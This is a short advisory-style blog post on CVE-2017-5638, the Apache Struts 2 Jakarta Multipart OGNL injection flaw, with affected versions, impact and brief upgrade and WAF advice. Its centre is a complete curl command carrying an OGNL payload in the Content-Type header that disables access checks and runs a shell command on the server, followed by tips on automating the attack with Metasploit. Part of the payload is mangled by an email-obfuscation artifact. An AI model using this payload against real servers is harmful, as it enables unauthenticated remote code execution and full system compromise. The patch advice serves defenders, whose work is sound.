Listen to this Post
How the mentioned CVE works:
The CVE-2017-5638 vulnerability exists within the Jakarta Multipart parser in Apache Struts 2. The flaw is triggered when a malicious `Content-Type` header is sent in an HTTP request. If the value contains an error message string, the parser incorrectly evaluates it using Object-Graph Navigation Language (OGNL) expressions. This improper evaluation occurs before any file upload takes place, allowing an attacker to inject and execute arbitrary OGNL code on the server. OGNL is a powerful expression language that can access and manipulate the underlying Java runtime, enabling remote code execution with the same privileges as the Struts application server. The attack vector is straightforward, requiring no authentication, and the malicious payload is delivered directly within a manipulated HTTP header, making it easy to exploit.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch available
What Undercode Say:
`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/struts2-showcase/fileupload/doUpload.action`
How Exploit:
Craft malicious HTTP request with OGNL payload in Content-Type header. Use tools like Metasploit for automated exploitation. No authentication required.
Protection from this CVE:
Immediately upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers. Disable the Jakarta Multipart parser if unused.
Impact:
Full server compromise. Unauthorized data access. Complete system control.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

